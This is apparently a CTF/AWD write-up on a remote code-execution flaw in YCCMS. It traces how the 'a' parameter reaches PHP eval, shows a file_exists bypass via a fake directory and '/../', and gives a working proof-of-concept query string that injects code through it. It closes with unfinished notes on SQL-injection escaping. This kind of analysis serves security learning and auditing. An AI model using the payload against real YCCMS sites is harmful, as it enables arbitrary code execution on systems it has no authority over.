bugku YCCMS漏洞

今天打bugku的在线awd

打的时候看到了

php 复制代码
	public function run() {
		$_m = isset($_GET['m']) ? $_GET['m'] : 'index';
		method_exists($this, $_m) ? eval('$this->'.$_m.'();') : $this->index();
	}

算个路由函数,通过m参数来指定model

当时就觉得eval这里有问题,但是看到前面的ethod_exists就感觉有力打不出,因为当时是内部赛,被别的事干扰了以至于去审计其他漏洞去了

事后我想着搜索一下这个yccms的漏洞没想到这里真的可以绕过

参考文章 https://blog.csdn.net/cosmoslin/article/details/123178882

POC

sh 复制代码
?a=Factory;phpinfo();//../

分析

从admin开始观察

php 复制代码
<?php
require str_replace('\\','/',substr(dirname(__FILE__),0,-6)).'/config/run.inc.php';
?>

跟进

可以发现代码很简单

如果类为Action结尾,就是controller目录下寻找

如果Model结尾,就在model目录下寻找

否则在public/class目录下寻找

跟进单入口

array数组中就是要登录才能访问的文件

这些文件都在controller目录下,以查询字符串a来传递控制器的类名

php 复制代码
if (!file_exists(ROOT_PATH.'/controller/'.ucfirst($_a).'Action.class.php')) $_a = 'Login';
eval('self::$_obj = new '.ucfirst($_a).'Action();');

漏洞点就在上面这个eval中,我们先看完整个流程
$_a 从getA 方法中来

而controller中,所有类都继承自 Action这个类

还记得单入口吗

这里实际就是返回后的控制器再执行了父类的run方法

首先判断本类是否有这个方法(method_exists),在eval执行本方法

总结一下

a指定控制器(类)

m指定类中的方法

任意代码执行

回过头分析漏洞点

php 复制代码
if (!file_exists(ROOT_PATH.'/controller/'.ucfirst($_a).'Action.class.php')) $_a = 'Login';
eval('self::$_obj = new '.ucfirst($_a).'Action();');

首先判断类是否存在,然后再new该类 我们可以通过 /../ 来绕过 file_exists 函数

这里举个栗子

php 复制代码
file_exists('index.php');	# true

上面判断是否有index.php

php 复制代码
file_exists('cvdavevfvdfavdacdsvd/../index.php');	# true

当我们伪造一个不存在的目录时,再使用 /.../,此函数则不会判断上一个目录是否存在

通过这个特性,我们只需要根据类的加载机制闭合前面的new语句即可执行

php 复制代码
eval('self::$_obj = new '.ucfirst($_a).'Action();');

还记得源码类的加载机制吗

如果类为Action结尾,就是controller目录下寻找

如果Model结尾,就在model目录下寻找

否则在public/class目录下寻找

所以我们再public/class目录下随便找个类即可,这里使用Factory测试

sh 复制代码
a=Factory;phpinfo();//../

sql注入

注入的话似乎很难

全局搜索addslashes函数

发现在Tool类中的setFormString函数

这是登录控制器的初始化类,主要负责登录的是AdminModel类

进入这个类,发现只要设置用户名或者密码就会进行引号的转义

我对这个转义现在还没有想到很好的办法,不知道有没有高手指点一下这个怎么过

相关推荐
码农12138号19 小时前
Bugku NUAACTF 2020 command-injection
web安全·代码审计·bugku·文件包含漏洞
小白勇闯网安圈20 小时前
bug、Confusion1、ics-07、
网络安全·php·web
pandarking21 小时前
[CTF]攻防世界:love_math
android·web安全·网络安全
小痞同学21 小时前
【网络安全】二、常用网络安全管理工具
安全·web安全·网络安全
渡我白衣21 小时前
计算机组成原理(5):计算机的性能指标
服务器·网络·c++·人工智能·网络协议·tcp/ip·网络安全
云计算练习生21 小时前
渗透测试行业术语扫盲(第十篇)—— 利用与提权类术语
网络安全·信息安全·提权·漏洞利用·渗透测试术语
小痞同学21 小时前
【网络安全】一、虚拟局域网设置和应用
网络·安全·web安全·网络安全
lingggggaaaa21 小时前
C2远控篇&C&C++&SC转换格式&UUID标识&MAC物理&IPv4地址&减少熵值
c语言·c++·学习·安全·web安全·网络安全·免杀对抗
骥龙1 天前
3.10、构建网络防线:防火墙、WAF 与蜜罐实战
服务器·网络·数据库·网络安全
小白勇闯网安圈1 天前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web